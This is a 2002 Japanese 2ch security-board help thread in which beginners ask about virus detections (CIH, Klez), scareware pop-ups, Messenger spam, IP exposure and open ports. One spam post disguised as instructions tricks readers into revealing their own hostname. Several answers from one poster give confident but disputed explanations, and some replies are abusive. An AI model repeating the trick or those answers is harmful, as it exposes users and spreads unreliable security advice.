1 :
>>1-20をよく読みましょう :
02/12/05 10:51
2 :
名無しさん@お腹いっぱい。 :02/12/05 10:52
【お約束】 ○ウィルスやブラクラのリンクを張るときは・・・ 他の方が誤ってクリックしても問題ないよう、直リンは避けてください。 ○アダルトサイトに行くときは・・・ インターネットオプション → セキュリティ→インターネット → レベルのカスタマイズ → ActiveX、JAVA、スクリプトを全て無効にしてください。 ○怪しいリンクを踏むときは・・・ view-source://URLでソースを表示して判断してください。Javaスクリプトなどは実行されません。 ○リンク先を直接見るときは・・・ 「対象をファイルに保存」して一旦ファイルにし、メモ帳で一度開いてください。 ○メールチェックをしたら、怪しいメールが届いていました・・・ 開かずに捨ててください。捨てようとしてクリックした時に感染する恐れがありますので、 Outlook Expressのプレビュー機能を必ずオフにしてから削除してください。 ○IE4.0、IE5.0、IE5.5を使用しています・・・ IE4.0は今後不具合が発見されてもフォローされません。IE5.5SP2かIE6.0SP1に乗り換えてください。 IE5.0、5.5の方はSP2にアップデートの後、各種パッチを当ててください。 ○ウィルス対策ソフトを入れていますが・・・ パターンファイル(ウィルス定義ファイル)を更新していなければ意味がありません。 感染する前に定期的にチェックしましょう。
【IPアドレス】
○IPアドレスを見るにはどうすれば・・・
自分のIPアドレスを見るにはMS-DOSプロンプトを起動して、winipcfg(9x系)か
ipconfig /all(NT系)を実行してください。
他人のIPアドレスを見るにはMS-DOSプロンプトを起動して、netstat -anを実行してポートから判断してください。
○IPアドレスから個人情報が抜かれたり・・・
プロバイダがもっている情報は公権力が無い限り、外部に公開することは無いと信じてください。
それよりも、コンピューター上のファイルなどから判断することの方が容易かもしれません。
○IPアドレスから利用しているプロバイダを知りたいのですが・・・
>>2-5 の【Whois】を利用してください。
なお、スレに結果を貼りつけても事態は進展しません。
【掲示板】
○掲示板が荒らされて困っています・・・
注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖
冷静に判断、選択し、対応してください。困っているのは貴方だけではあ
りません。
○掲示板の利用者のIPアドレスは抜けますか・・・
HTMLソースに書いてあることもありますが
【ウィルス】
○Macを使ってますが、Windowsのウィルスに感染しますか・・・
WindowsのアプリケーションがMacで利用できないように、WindowsのウィルスはWindowsのプログラムなので実行できず、
感染はしません。
○ウィルスに感染しましたが、ウィルス対策ソフトを持っていません・・・
ワームに感染した時は可能ならば、Firewallで予めメールを拡散しないようにアウトバウンド、
リモートポート25を止めてみてください。但し、その間メールの送信は出来ません。
ActiveXを有効にした上で、オンラインウィルススキャン
http://www.trendmicro.co.jp/hcall/index.aspを試してみてください 。
○ファイアーウォールがトロイのアクセスをブロックしました、感染しているんですか・・・
バックドアツールによって通常開かれるポートへのアクセスをファイアーウォールがトロイと表示することがあります。
アウトバウンドで検出された時は感染している可能性が高いです。
インバウンドで検出された時は感染している可能性は低いですが、念のためチェックをしてください。
○ウィルス対策ソフトの「駆除」、「隔離、検疫」、「削除」の違いは・・・
「駆除」はファイルからウィルスを取り除くことです。但し、常に完全というわけでもないようです。
「隔離、検疫」はファイルをリネーム、移動したり、データを欠落させて実行できないようにします。
「削除」はファイル自体を削除してしまいます。ワーム本体は通常、削除されます。
○webメールのアドレスにウィルスメールが届きましたが、開いても感染しませんよね・・・
webメールサービスやウィルスによるので一概には答えられません。
また、添付ファイルを実行してしまった時は感染したと思って間違いないでしょう。
hotmailはウィルスを検査していますが、新種のウィルス相手には無力です。
○ウィルスらしきメールを受け取ったのですが、添付ファイルがありません・・・
ゲートウェイ型のウィルス対策ソフトでウィルス本体が削除されたか、ウィルスの機能が不完全で
ファイルを添付する能力を失ったなど様々ですが、開かずに捨てるのが懸命です。
○「jdbgmgr.exeがウィルスだ」というのはデマです。削除してしまわないように。
http://www.ipa.go.jp/security/topics/alert140515.html参照 。
11 :
名無しさん@お腹いっぱい。 :02/12/05 11:11
>>1 スレたてお疲れ様です。
さっそくですが質問させてください。
OSはwin98se、ブラウザはie6です。
昨晩マイクロソフトのページでウィンドウズアップデート
をかけているとノートンがウィルスの警告をしてきました。
そのままノートンを操作して問題のファイルを削除
してしまったのでウィルス名はわからないのですが、
感染していたファイルはC:\WINDOWS\JAVA\CLASSESにありました。
確かMLなんとか.zipだったと思います。
今朝、心配だったのでノートンでウィルススキャンしてみると
ぜんぜん違う場所にあるkissld.exe(着せ替え遊びのソフト)
というファイルがW95.CHI.remenanthに感染しているという
結果がでました。
このファイルは1年以上前に入手したもので今まで何回もスキャン
しても感染という結果はでた事はありません。
昨晩のアップデートと関係があるのでしょうか?
なにかわかる方、よろしくお願いします。
こんな真昼間にスレ立てしてる
>>1 を愛してあげたい
16 :
名無しさん@お腹いっぱい。 :02/12/05 12:06
携帯からでもスクリプトとか組んだら結構面白いこと出来ますか? ドコモですが
携帯でもってスクリプトファイル書いてたら気が狂うに8000ワレメ
理論的には出来るの?出来ないの?
>>20 使い切ったら落ちるし
こんな過疎板じゃ落ちたらHTML化するまで何ヶ月かかるかわかんないから
拒否します
>>19 死ね
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
まぁ
>>16 と
>>19 と
>>24 はネットランナーでも読んでオナニーしてなさいってことだ
携帯でもスクリプト発動するの? ジャバとかなら愛アプリ作ってるぐらいだから出来るかな?
さて、ブラウザの仕様も調べられないゴミはほっといて 次の質問者の方どうぞ
携帯ってブラウザなんなの? これぐらい教えてよ
もうテンプレ書き終わったと思って
>>11 に質問書いてしまいました。
なんかスルーされちゃってるみたいなんですが、もう一回書いたほうが
いいでしょうか?
>>29 関係はあるかもしれないし、ないかもしれない。
そんなことは分からない。
取り敢えず、引っかかったら検疫しとけ。
>>11 W95.CHI・チェルノブイリ・ウィルスは潜伏性があるので今までのウィルス
スキャンで発見できなかっただけかもしれません。それがウィンドウズアップ
デートをきっかけに活動を始めたのだと思います。
それから、ノートンを使った事がないのでわかりませんがノートンのフォルダに
ログファイルはありませんか?常駐タイプのウィルス対策ソフトにはログ
ファイルのあるものも多いと思います。探されたらどうでしょうか?
尚、チェルノブイリ・ウィルスは非常に凶悪だそうですので、それ以外に
感染ファイルがないかvectorでアンチドートをダウンロードしてチェック
される事を進めます。(必ず、「コード解析」だけでなく「圧縮ファイル」と
「メール確認」にもチェック入れてください。)
http://www.vector.co.jp/soft/win95/util/se108623.html それから、いつまた、再発するかわからないのでバックアップはこまめに
されるよう勧めます。
>>29 Chernobyl関連だとするなら詳しい人を待った方がいいかもね
あ、あと「彼」には注意しろよ
「彼」FAQ Ver0.0
Q1 「彼」って誰ですか?
A1 セキュ板に2002/11頃から現れた、困ったチャンです。
Q2 どのように困ったチャンなのでしょうか?
A2 回答は的外れの場合が多い。しかし、口調は丁寧かつ親切、それで
いて妙な自信が感じられるので質問した初心者が騙されてしまいます。
Q3 住人はどう対応しているのですか?
A3 基本的には放置です。しかし初心者を騙している時はしょうがなく叩きます。
Q4 「彼」を発見しました。どうすればよいですか?
A4 基本的には放置です。初心者が騙されそうになっている時はその人が騙されない
ようにする事を優先してください。
http://pc.2ch.net/test/read.cgi/sec/1037350545/958
>>34 >>35 ヤブ公もうざいが、ヤシの粘着の焼く立たずイムポは余計にウザイ。
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | それを踏まえて次から何事もなかったかのようにどうぞ。 ∧ ∧ |/\___________________ (,,゚Д゚)____. (つ/~ ※ ※ \ /※ ※ ※ ※ \
>>34 >>35 >>38 >>32 の人が言ってる事は間違ってるということでしょうか?
ちなみにノートンの活動ログを調べてみると
ウインドウズアップデート中にノートンが反応して削除したファイルは
C:\WINDOWS\JAVA\CLASSES\xmldso.cabでした。
>>39 まぁ
>W95.CHI・チェルノブイリ・ウィルスは潜伏性があるので今までのウィルス
>スキャンで発見できなかっただけかもしれません。それがウィンドウズアップ
>デートをきっかけに活動を始めたのだと思います。
チェルノブイリに潜伏性があるのは確かだが、WindowsUpdate云々は確証がないわな
つか W95.CHI.remenanthじゃなくってW95.CHI.remnantsじゃない?
英語サイトのSymantecのウィルス辞典には載ってるみたいだが
それ以上の面倒は見切れないよん
あと破壊活動まで潜伏するんであって スキャンすりゃ見つかるだろ
>>40 ありがとうございます。
>W95.CHI.remnantsじゃない?
すんません、そうでした。
Symantecの日本語のページにはW95.CHIの解説はあったのですが
W95.CHI.remnantsに関してはウィルス定義にアップデートデータ
しかありませんでした。
教えていただいた英語のサイトに行って日本語に翻訳してみます。
ちなみに感染していたkissld.exeの作成日時は2000年1月27日でした。
なんでいままでスキャンにひっかからなかったのだろう?
remnants=残りくず 誤検出かしらん
>>43 そのような意味のようですね。
Symantecの英語サイトの解説文を和訳ツールで訳してみました。
W95.CIH.remnants次のものの上で発見されました:2002年11月21日最後に、
次のものの上で更新されました:2002年11月27日午後11:04:30W95.CIH.remnantsは
特に実行可能なファイルのW95.CIHの残りを発見するために作成された検知です。
たとえウィルス・コードが実行されなくても、ファイルはまだウィルスの残りを
含んでいます。
これは、正常なようにウィルスがファイルにいるが、ファイルが走る場合を含んで
います。
これらの場合では、ウィルスが全く実行しません。
しかしながら、ウィルスがファイルにいるので、それは検知されるべきです。
また、ウイルスの身体が削除されるべきです。シマンテックは、
ロータス・ノーツ・ソフトウェアのいくつかの営利上利用可能なバージョンで
W95.CIHが送られるこれらの残りを含んでいるファイルに気づいています。
注:2002年11月21日に先立った定義はW95.CIH.corruptとしてこれらの残りを
検知するでしょう。
46 :
名無しさん@不安でお腹いっぱい。 :02/12/05 15:19
こんにちは。 初めてココに書き込ませていただきます。 実はUS版yahooのyahoo moviesを覗いていたところ、突然ポップアップで 警告文が表示されました。 見出しは「protect yourself!」で、内容は did you know? your computer is recording the following: websites visited-chat sessions-all pictures viewed-pop-ups loaded your credit card info-all your activities can be tracked from anywhere this could be your last chance to protect yourself click here to permanently erase your tracks!(←この部分は、早く押せと言 わんばかりに赤く点滅) +++++++++++++++++++++++++++++++++ ご存じですか。あなたのコンピューターは下記を記録しています: あなたのクレジットカード情報、あなたの活動は、すべていかなる場所からも 追跡することができます。 これはあなた自身を保護するあなたの最後の機会でありえます。 永久にあなたの軌跡を削除するためにここをクリックしてください!(赤点滅) +++++++++++++++++++++++++++++++++++ と、こんなコトが書かれているようなのですが、写真等閲覧していただけなので何のことか 判らず勿論クリックもせずに、ただ消してしまったのですが何だか気になって・・・。 コレって一体何だったのでしょうか?(どうもyahooからの警告のようには 思えなかったのですが・・・) もし、ご存じの方居られましたらどうかよろしく御願いいたします。
書き忘れたのですがW95.CIH.remnantsに関しては
>>44 にあるとうり2002年11月27日に検知できるようになった
ということで解決ですね。
xmldso.cabのほうがよくわかりません。
良くサーバーとかで暗号化しないとアクセス出来なかったりしますが それを個人PCで実現することは可能でしょうか? それによってセキュリティが高まる気がするのですが・・・
>>11 ウィルスがあっても単離状態でないとウィルス対策ソフトが反応しない事が
あります。
たとえば、ウィルス対策ソフトでパソコン全体をスキャンしてもKlezや
Badtrans Bのような有名なウィルスでも添付メールがOEのメールフォルダに
ある場合反応しないのが多いです。
ただし、私が
>>32 で紹介したアンチドートはOEのメールフォルダにあっても
反応します。
また今日は全開だねw セキュ板の皆さんご愁傷様
すいません。今後気を付けるので 教えて下さい
>>56 駄目な例
・名前、本文に「初心者」が入っている。
・2度目以降の書き込みに通し番号が入っていない。(主に捨てハン)
○環境・状況が書かれていない、または小出し。
・質問が1行。
◎日本語がおかしい。
・検索という言葉を知らない。
自分の文章をもう一度読み直して見ましょう。
第三者が読むと意味不明です。
>>55 今後マルチにならないように気を付けます。 では改めて質問をさせていただきます。 良くサーバーとかで暗号化しないとアクセス出来なかったりしますが それを個人PCで実現することは可能でしょうか? それによってセキュリティが高まる気がするのですが・・・
(;´Д`)ハァ…
>>58 ちょっと文章の意味がよく分かりません
・良くサーバーとかで暗号化しないとアクセス出来なかったりします
・それを個人PCで実現する
以上の二点が何を指しているのか分かりません
またこれが分かっても環境等が全く書かれていないので具体的な方法を示す事ができないと思われます。
(´-`).。oO(放置でいいんじゃない・・・)
動画うpキタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!!!!!!!!
★☆★裏2ちゃんねる更新しますた
1.書き込みの名前の欄に
http://fusianasan.2ch.net/ と入力します。
2.E-mail欄に、フェラ/ハメドリ/ザーメン/ゼンラ/ラブホテル+出身都道府県を"カタカナ"
で明記して下さい。
3.本文にIDとパスワードの guest guest を入れて、書込みボタンを押します。
4.メッセージが「確認終了いたしました。ありがとうございます。」に変わればばOK
5.サーバーが重いと2chに戻ってくるけど、まあ30分以内であれば何回かやれば大丈夫。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入力してください!!
http://fusianasan.2ch.net/ ←は、管理者専用の為「直リン」で飛んでも
「サーバーが見つかりません」になります。入り口は「表2ch」のCGIだけです。
つまり、この掲示板から上記の操作を実行してください。
7.裏2ちゃんねるの内容については違法性、反社会的な内容を多く含んでおりますので
ご自身で確認してください。サイトの内容についての質問はご遠慮願います。
8.裏はアクセス過多になりやすいので表から誘導すると向こうの住人が怒ります。
guest guest
質問なんですが、アウトルックのアカウントの項目欄に 知らない間に自分以外の見知らぬアカウントが5つ程追加されていました。 削除したんですがメールにはまったく支障ありません。 誰かになんかされていたんでしょうか? ((((((;゚д゚))))))ガクガクブルブル
>>65 そもそも家族とかが勝手にいじったりしてたりとかしてない?
あ、日本語が変
>>66 家族は私以外パソコンなんて扱えないので
そんな事は絶対にありえません。
OSもXPで起動時にパスワードかけてるし…。
あやし〜サイトにも行った記憶がありません(w
>>65 ウイルス検索
送信済みメールフォルダの確認
最新パッチの適用
ぐらいはやった方が良いと思うけど?
なにやられたか知りたい時は、PFW入れて全ての通信のログを記録すると良いよ。
OutlookExpressや IEは使わないのがセキュリティ的に高いと思う。
意表突いてディレクトリサービスだ、に一票。
>>68 アカウント勝手に作成問題は、漏れわからんのですが。
homeなら、Safe Modeでしかお目にかかれない、Adminisitratorってアカウントは塞ぎますたか?
レス違いの話でスマソ。
セキュリティ対策何もしてないのですが一体何をされる可能性がありますか? ウィルス埋め込まれるくらい何でもないことなので除外するとして、、 みんな何故セキュリティ対策はしたほうがいいよ!っていうのか理解できません
ネットに繋げると、2〜3分おきにウイルスバスターが起動して 「NetBIOS Browsing」って出るのですが、ウイルスに感染してしまったのでしょうか?
>>11 えーっと、たとえば、フリーソフトなんかで時々DLLとか特定のバージョンの
ビジュアルベーシックとかのランタイムがなければ動かないのがありますよね。
さすがに有料ソフトではそういうの滅多にないでしょうけど。
で、何が言いたいかというと、ウィルスも一種のプログラムだからそういう
DLLとかランタイムとかがなければ動かない場合もあるという事です。
だからウィンドウズアップデートして不足してたDLLとかをダウンロードした
とたん休眠中のウィルスが活性化した可能性があるんじゃないのかなと
思います。それでウィンドウズアップデート中にノートンが警告発して
ファイルを削除したのかもしれません。
>77 具体例を挙げてみろよ。もちろん情報ソースもつけてな。 それができないならもうこの板、いや2ちゃんにくるな。
>>77 kissld.exeに感染しただけ、じゃないの?
80 :
名無しさん@お腹いっぱい。 :02/12/06 10:02
age
82 :
名無しさん@お腹いっぱい。 :02/12/06 10:30
>>11 アァ、xmldso.cabはWin9X系のアップデートする際にも
ノートンはウイルスとして誤検出してしまう事は良くありますね〜。
気にしなくてよろしい。
ゴ ケ ン シ ュ ツ です。
又、xmldso.cab(OSアップデート)とW95/CHI は別問題と思われ。
>>81 さんの通りkissld.exeが W95/CHI に感染しただけですナ。
84 :
名無しさん@お腹いっぱい。 :02/12/06 11:13
ノートンいれたらヤホーのチャットでボイスができなくなってしまいました TCPのせいらしいのですがどうやって設定を変更すればいいかわからず 困っています
そういやそんなことがあったなぁ
>>84 正規ユーザなら、サポートに聞け、まだ真昼間だろ。
87 :
名無しさん@お腹いっぱい。 :02/12/06 12:01
ノートンインターネットセキュリティーバージョンは3.0です。 FFFTPをインストールしたところ、すべてのwebサイトが表示できなくなりました。 慌ててアンインストールしましたが、直りませんでした。 セキュリティを無効にすれば直るのですが、 それでは意味が無いのでなんとかしたいです。 どなたか教えていただけないでしょうか? OSは98です。よろしくお願いします。
88 :
名無しさん@お腹いっぱい。 :02/12/06 12:18
89 :
名無しさん@お腹いっぱい。 :02/12/06 15:06
あの、質問です。 お昼ごはんを食べて帰ってきたら、見たことのない「メッセンジャ サービス」 という窓が開いていて、Fucking USA...とUSAさんから私のIPあてにメッセージ が届いて(届いたように見えただけ?)ました。 ジョークソフトでこゆのあるんでしょうか?
>>89 見たことないっていっても、MSNとか入れっぱなしだろう?
windows messengerとMSN〜とヤフ〜が入ってるのですがアイコンの絵のとこが空で バツも微妙に小さかったりと見たことがなかったもので・・・。 その窓の使ってるのを「プロセス」で見たら「csrss.exe」と出たんですが なんのことやらサパーリです
あ、申し訳ないっす。 OSはwinXPのSP1でつ。windows messengerはヴァージョンアップしたら MSN messengerになってしまいました。
>91 レスさんくす〜 「小さい窓」つーのでこれみたいですわ。広告だったらもっとわかりやす かったんですが。なるほど。 おとなしくファイアーウォール使いまふ・・・
>>79 >>81 ありがとうございました。
だけどなんで感染したんだろ?
どのように感染するウィルスなんだろう?
とりあえず不安なのでシマンテックのCIH駆除ツール使ってみます。
>>82 ありがとうございます。
98でも検出されちゃう事あるんですか。
NT系だけなのかと思ってました。
CIH駆除ツールを使ったら "The W95.CIH virus was not found in memory." との結果でした。 とりあえず一安心でしょうか? いろいろ教えてくれた方々、本当にありがとうございました。
98 :
名無しさん@お腹いっぱい。 :02/12/06 16:59
インターネットやる人は、セキュリティのことを考えて ネット専用に使うパソコンとそれ以外のパソコンという感じで 使い分けてる人が多いんでしょうか?
99 :
名無しさん@お腹いっぱい。 :02/12/06 17:00
先程2CHのスレに貼ってあったアドレスを クリックしたらブラクラでした。 電源OFFにして立ち上げ直し、ウィルスチェックを かけたら(Norton Antivirus)、1ファイル発見されました。 ファイル名:I50[4] ウィルス名:VBS.Internal これはこのまま削除すれば良いのでしょうか。
100 :
名無しさん@お腹いっぱい。 :02/12/06 17:09
101 :
名無しさん@お腹いっぱい。 :02/12/06 17:17
>>100 1のHPで検索して、100さんのHPへ行きつき、
恐る恐る先程削除しました。
ちょっと怖かったのですが、レスを見てこれで大丈夫だと
確信しました。お手数お掛けしました。
どうもありがとうございました。
皆さん質問です。助けてください。 >102って藪本人ですか?
スレ違いなので隔離スレでやってくださいです。
105 :
名無しさん@お腹いっぱい。 :02/12/06 18:15
>>103 確実に言える事はオマエがどうしようもないアフォだと言うことだYO.
106 :
名無しさん@お腹いっぱい。 :02/12/06 18:18
あの、DMZ機能を利用して防御パソコンを 作れると聞いたのですが、どういうことでしょうか?
そう言われましても…
108 :
名無しさん@お腹いっぱい。 :02/12/06 18:23
防御パソコンと言う言葉を良く耳にするので質問したのですが・・・
>>106 DMZに存在していないプライベートIPアドレスを設定する。
そうするとポートスキャンやpingスキャンに時間がかかるようになる。
こういうことか?
110 :
名無しさん@お腹いっぱい。 :02/12/06 18:31
あ、そうなんですか。有り難う御座います
>>78 もしかしてあなたは自分の事を上級者だと思ってるんじゃないですか?
でも、御指摘の点についてはあなたの知識は初級レベルですよ。
DLLやランタイムとかがないと活動できないウィルスがあるので不要なDLLや
ランタイムは入れないというのは常識だと思います。ランタイムじゃないけど、
マクロウィルスでもマイクロソフトOffice製品がないと動かないそうです。
http://www.iwakuniit.net/newVirus/3-0-0.htm >特にWindows98、InternetExplorer5以降は、ワードやエクセルに採用し
>セキュリティ上、問題があると再三指摘されてきたActiveXコントロール、
>VBS(ビジュアルベーシックスクリプト)とWSH(WindowsScriptingHost)が
>標準で導入されたため、それを利用したウィルスがたくさん登場しています。
http://www.symantec.co.jp/region/jp/sarcj/win.script.hosting.html >VBS.LoveLetter.Aのようなワームが急激に広まり、多大な被害を与える脅威と
>なったのは、どのような背景によるものでしょうか?
・・・・・
>電子メールに添付された.vbsファイルとして届くウィルスから身を守るための
>防御手段の1つとして、Windows Scripting Hostを無効にするか、または削除
>する方法があります。
あーあ 漏れは知らんぞ。見なかった事にしとく 一抜けた
相変わらず論点がずれてるな。
115 :
名無しさん@お腹いっぱい。 :02/12/06 23:38
さっきHP(エロサイトではない)をみてると、いきなりMicrosoftから画面に、 他人にPCに侵入された恐れがあるから、防御用のソフトをカードで買えみたい な内容だったのですが、これはPCが誰かに侵入されたと考えていいのですか? ちなみに回線はADSLでチャットはやります。
( ´ー`)oO(言われたことを素直に信じるなんてかわいいわねぇ・・・。たべちゃいたい)
うむ。日本の将来は期待が持てるのか不安なのかよくわからんぞ。
119 :
名無しさん@お腹いっぱい。 :02/12/07 00:59
>>115 消火器や浄水器の訪問販売・逆探知商法と同じです。
よく考えましょう。
真面目に困ってます。 2ちゃんに個人情報を書かれてしまい、それからイタ電ばかり。 1人だけでなく何人も被害にあっており、 警察にも相談中なんですが、書き込んだ人間がまた書き込みしたりして 収集つきません。これって書き込んだ人って特定できますか? 他板から来てる、この板の初心者です。
>>120 書き込んだ人間を特定するのは警察の仕事、っつーか個人では例え
IPアドレスを収集できたとしても、使用しているプロバくらいしかわからんよ
警察にしつこく言った方がいいかと・・・
122 :
名無しさん@お腹いっぱい。 :02/12/07 03:36
すみません、教えていただきたいのですが IPアドレスが掲示板上に載ってしまったら 個人情報の何が分かってしまうんでしょうか? 今晩それに気づき、寝ずにいろいろ調べていますが いまいち良く分かりません。 御教授、宜しくお願いいたします。
>>122 >>121 の書き込みとこのスレのテンプレ
>>9 を見た上で聞いてるんなら
お前の書き込みからお前の個人情報を超能力で割り出して
お前を探し出して頃してやる
124 :
名無しさん@お腹いっぱい。 :02/12/07 03:41
すみません、打つのが遅くて気付かなかったんですが
121さんのおっしゃる通り、個人情報は分からないんですね。
でも、一緒に会社のアドレスみたいのも載ってる人がいて
試しに
http://wwwの後ろに入れたら会社のサイトが 出てきました。
これが掲示板上に載っているということは、一般的にマズイ事
のような気がします。管理人に言った方がいいでしょうかね??
125 :
名無しさん@お腹いっぱい。 :02/12/07 03:45
>>122 あなたが固定IPなのかどうかが論点です。まぁIPアドレスが載った事
を心配されてるようなので、固定なのでしょう。知られると・・・。
アタックされPCが破壊され・・・なんてことは、あんまりないですよ。
ハッカーが他のサーバなどにアタックをかけるための踏み台になる可能性
は、ありますがね。
126 :
名無しさん@お腹いっぱい。 :02/12/07 03:46
123さん、本当に打つのが遅くて気が付かなかったんです。 すみません。御冗談とは言え、本当にビビってるところなので あまり脅かさないで下さいね。 御助言ありがとうございました。 安心して寝ようと思います。
おい知障野郎 具体的に何がまずいか明示してから質問しろ
冗談じゃねーよ テンプレ読まない教えて君は頃されて当然だ
129 :
名無しさん@お腹いっぱい。 :02/12/07 03:49
125さんありがとうございます。 プロバイダーの方では24時間交代のIPということでした。 多分、大丈夫なのでしょうね。
130 :
名無しさん@お腹いっぱい。 :02/12/07 03:53
>>127 ,128
まぁまぁ、マターリしようよ
夜もまだ長いし( ・∀・)
>>129 なら大丈夫ですよ。安心して早く寝ましょう☆
/\⌒ヽペタン / /⌒)ノ ペタン ∧_∧ \ (( ∧_∧ (; ´Д`))' ))(・∀・ ) < ひとまずもちついてやるからな! / ⌒ノ ( ⌒ヽ⊂⌒ヽ .(O ノ ) ̄ ̄ ̄()__ ) )_)_) (;;;;;;;;;;;;;;;;;;;)(_(
130さん、ありがとうございます!! 今晩の事はかなり焦りまくってパニクってました。 スレの約束事も無視した形になってすみませんでした。 でも、ここで直接聞いた事でやっと安心できました。 それでは、お先に失礼します。。。
133 :
名無しさん@お腹いっぱい。 :02/12/07 05:56
緊急です!!! 昨日、mxで6時間くらい遊んだあと、ノートンが自動でウイルスチェック をしてくれたんですが、○○○ラブレターなのものをハッケソしてくれた のはいいんですが、「駆除できませんでした!」というのです。 ビビって私はなんとか永久的の追放(?)みたいな事をしたので、 再度チェックしてもなにも引っかからない状態なのですが、_default とか、怪しげなものがマイコンにはいっているのです。まだ感染している ならどうすればよいのでしょうか?今するべき事はなんでしょうか? 教えて君で本当にすいません。。
こんな奴がMXやってるなんて驚きだな
136 :
名無しさん@お腹いっぱい。 :02/12/07 12:59
>>133 ウイルスが怖くてMXをやろうと思わない。
FAQサイトや流通してるテキストで危険リストが出回ってるから参照すべし。
何を落としたかは見当が付くが・・・
138 :
名無しさん@お腹いっぱい。 :02/12/07 14:27
ネットにつないでいたら、 突然ダイアログボックスが出て、 「MICROSOFTから211.46(IPアドレスです)へ次のメッセージ」 と表示され、メッセージは Fucking USA となってました。OKボタンを押すと、そのダイアログボックスは無くなりましたが、 怖いので、トレンドマイクロのオンラインスキャンを試みました。 ところが、サーバーが使用中といわれ、スキャンすることが出来ませんでした。 いままで、何度もやってますが、こんなことは初めてです。 なにかされてしまったのでしょうか?
>>138 なぁ、いい加減質問するときはスレを読めよ馬鹿
>>89 あたりから読んでみろ厨房
>>138 ネタだろ氏ねよ
https://grc.com/x/ne.dll?bh0bkyd2 ↑の『Probe My Ports』でテストしてみたら
・21(FTP)OPEN!
・23(Telnet)OPEN!
で他は全てStealth!でした。
開いているポートは何処で塞げばいいのですか?
ちなみに、ADSL(Yahoo!BB)で接続。
モデム→ルーター(ステルスの設定済み)→PC
PCはWin2000、ノートンパーソナルファイヤーウォール
マカフィーウィルススキャンを使ってます。
よろしくお願いします。
>>141 リンク死んでるんだけど。間違ってない?
>>141 何がしたいんだ?
Shields UP! is checking YOUR computer's Internet
connection security . . . currently located at IP:
ココを確認→
YBBだと自分のIPアドレスでない可能性があるということか…
>142&147 ??? 藪?
149 :
名無しさん@お腹いっぱい。 :02/12/07 16:45
アウトルック等よりWEBメールのほうが盗聴されにくい と聞きましたが、本当のところはどうでしょうか?
ご免ファイアウォールのせいだった。 ルーターは何を使ってるの?
>>150 ルータの設定がうまくできていないんでは?
ルータ介さずに接続して試してみればどうかな。
ルーターはIO DATA(NP-BBRsx)です。
ぐふっ、しらんなあ。漏れのは104FHといってオムロン社 の奴なんだがステルスになるけど・・・
>>141 「ルーター(ステルスの設定済み)」の中身を詳しく書いてみ。
>>155 ステルスモード
NP-BBRsxがインターネットからのpingやWWWリクエスト応答しなくすることができます。
設定を有効にする場合は、チェックボックスにチェックを入れてください。
有効/無効の設定しかなくて、もちろん有効にしてます。
>>156 たぶんそのルータでは21番や23番は閉じれないんだろう。
IPフィルタリングもできないんでしょ。
>>157 IP アドレスフィルタ
LAN側に接続している特定のIP アドレスをもつパソコンからの
インターネット側への通信を破棄する機能です。
TCP/UDPポートフィルタ
LAN側に接続している特定のTCP/UDPポートを利用したパソコンからの
インターネット側への通信を破棄する機能です。
ヘルプではこんな感じに書かれています。
やっぱり、もっとマシなルーター買えってことですかね?
逝ってきます・・・
みなさん色々と教えてくれてありがとうございました!
>>159 度々ありがとうございます。
もう少し見直して勉強してみます。
161 :
名無しさん@お腹いっぱい。 :02/12/07 18:07
ノートンアンチウィルスにはファイヤウォール機能ないんですか?
>>161 ないです
ノートン「アンチウィルス」ですから
>>161 ないよ。FW+アンチウィルスは「ノートンインターネットセキュリティ」
間違ってlist01.exeを実行してしまいました。すると、HDがガラガラいいだしてWINDOWSインストーラが始まって、以降ネットに接続できなくなりました。どうすれば直るか教えて下さい。まだWINDOWSは終了してません。 ケータイから書き込んだので外出かもしれませんが、アドバイスお願いします。
あるexeを踏んでしまったらwindowsのスタートのとこが爆発? してしまったのですぐに電源落として再起動したんですが、 後でスキャンしてみるとウィルスらしきものがありませんでした。 大丈夫でしょうか?
WINDOWSインストーラがでたあと、選択した機能はCD―ROM、または現在使用できないほかのリムーバブルディスクにあります。ディスクを挿入してOKをクリックします。 とでます。一体何が起こったのですか?もしかして消えたのですか?助けて下さい。
HDDは動きますが起動しないプログラムがあります。
わけもわからずexeを実行するとは、おまえらなかなかやるな(*´∀`)
使用機種NEC LaVie L LL750/2 (PC-LL7502D) 使用メーラー Becky!Internet Mail version 2.05.06 使用ブラウザ IE 6.0.2600.0000 ウィルスW32.klezに関して質問したいのですが長文になるため2ch以外でウィルスに詳しい方のいるレスの早い掲示板を教えてください。 またはここで質問させていただいてよろしいでしょうか? レスよろしくお願いいたします。
私はどうすればよいのでしょうか?
>>171 2chの勇気がなくて見れない画像御願いリストにあるみたいですね。
パソと引き換えにどんな画像が見れたかぜひ知りたいです。
>>172 ご丁寧にありがとうございます。
さっそくやってみます。
【注意】 荒らしがもっともらしいレスをつけることがありますので、よくよく注意して読んでください。 他のレスとの矛盾や話の展開から逸れていないか注意することです。
>>174 HDDが止まってなきゃHDD壊れるかも。
>>174 怪しいレジストリ出来てないか調べられるか?
>>179 インターネットエクスプローラが使用不能になったので見れません。
(現在かちゅーしゃからの書き込み)
どんなことが書いてあるのですか?
>>174 レジストリの見方はわかりますが、怪しいレジストリの見分け方がわかりません。
>>181 まずシャットダウンする前にバックアップしれ!
レジストリのHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に変な値ないか調べれ
わかんなきゃ書き出せ!
174は180の間違い。スマソ
>>179 に書いてあったわ
Whistler %System%\whismng.exe -next
ね
>>183 そのレジストリには
(規定),
Appoint,
AtiPTA,
CloneCDElbyCDFL,
CMESys,
DAEMON Tools-1033,
IMEKRMIG6.1,
imjpmig,
IMJPMIG8.1,
LTSMMSG,
MSPY2002,
NECMFK,
NMFTASK,
PHIME2002A,
PHIME2002ASync,
RealTray,
WinampAgent,
WinHandAutoClean
という名前のアイコンがabのものがありました。
>>187 スパイウェアも入ってるしw
無事復帰したらPC内掃除しれ!
で、どうだったか?
